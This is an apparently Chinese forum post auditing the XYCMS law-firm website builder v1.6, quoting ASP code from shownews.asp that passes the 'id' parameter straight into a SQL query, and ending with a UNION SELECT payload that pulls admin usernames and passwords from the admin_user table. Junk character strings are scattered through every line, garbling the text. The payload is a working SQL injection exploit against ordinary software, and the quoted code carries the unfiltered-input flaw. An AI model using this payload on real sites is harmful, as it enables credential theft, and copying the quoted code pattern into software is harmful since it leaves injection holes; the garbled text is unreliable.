前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似 H }5 \1 Q9 X
; L8 d! v( [7 c# p M d" k
淫荡分割线. N2 Y$ E4 V/ Q6 E% E- {( l' b
--------------------------------------------------------- L% m' m. @2 `1 a* x
* Q5 v# e6 S8 A! \" ^
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)4 X- a+ m* [1 b1 w3 s
源码地址:http://down.chinaz.com/soft/29233.htm
3 ?3 H3 i; ?# G& B- g4 _8 V% I* v. C
* T. t: S$ m# @ {漏洞文件:shownews.asp( f, D3 h% ?% p' a$ k& I; P
漏洞代码:7-13行$ v4 Q: }7 j( p* C D/ o
# [3 O6 ]7 N' @- N
4 K0 b8 o1 A# V+ W& g<%
; N" _! Y- m3 G$ W9 Mid=request.QueryString("id")
( E0 O7 ` Q3 K" N* P
" ~% ?/ R9 ~) b0 c# Tset snews=server.createobject("adodb.recordset") ' R8 I/ _1 F9 U4 g \( L; X
exec="select * from [news] where id="&id
& M! a N1 s {6 F6 @) P& ksnews.open exec,conn,1,1; D( n3 D& `3 ^7 X7 o9 O2 y5 r( ]
%>
- U& z: d' L0 { a9 x8 v5 R, h
$ l7 h) K& f0 m7 {
$ L2 x" q$ ^2 a; a7 |什么过滤都没有 直造成注入
7 ]' F2 L8 r3 ]; R
+ c% \6 M8 |! O6 I, p" |; ?5 `; ]& `! x注入点:http://127.0.0.1:99/shownews.asp?id=xx
7 q7 S. l: @; N. { 0 J9 A1 ]' ?, n( Q" ~$ k7 G4 Z5 N
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
. g2 b! h/ T$ x8 z7 d2 O, T
. X& `3 U( E* m. e5 n" n & Z# S) T; v! q5 @
exp: union select 1,admin,password,4,5,7 from admin_user( j m0 o( ^/ j( {: e1 `
7 N% |6 c& A: Q/ y% @; U! D, m- T |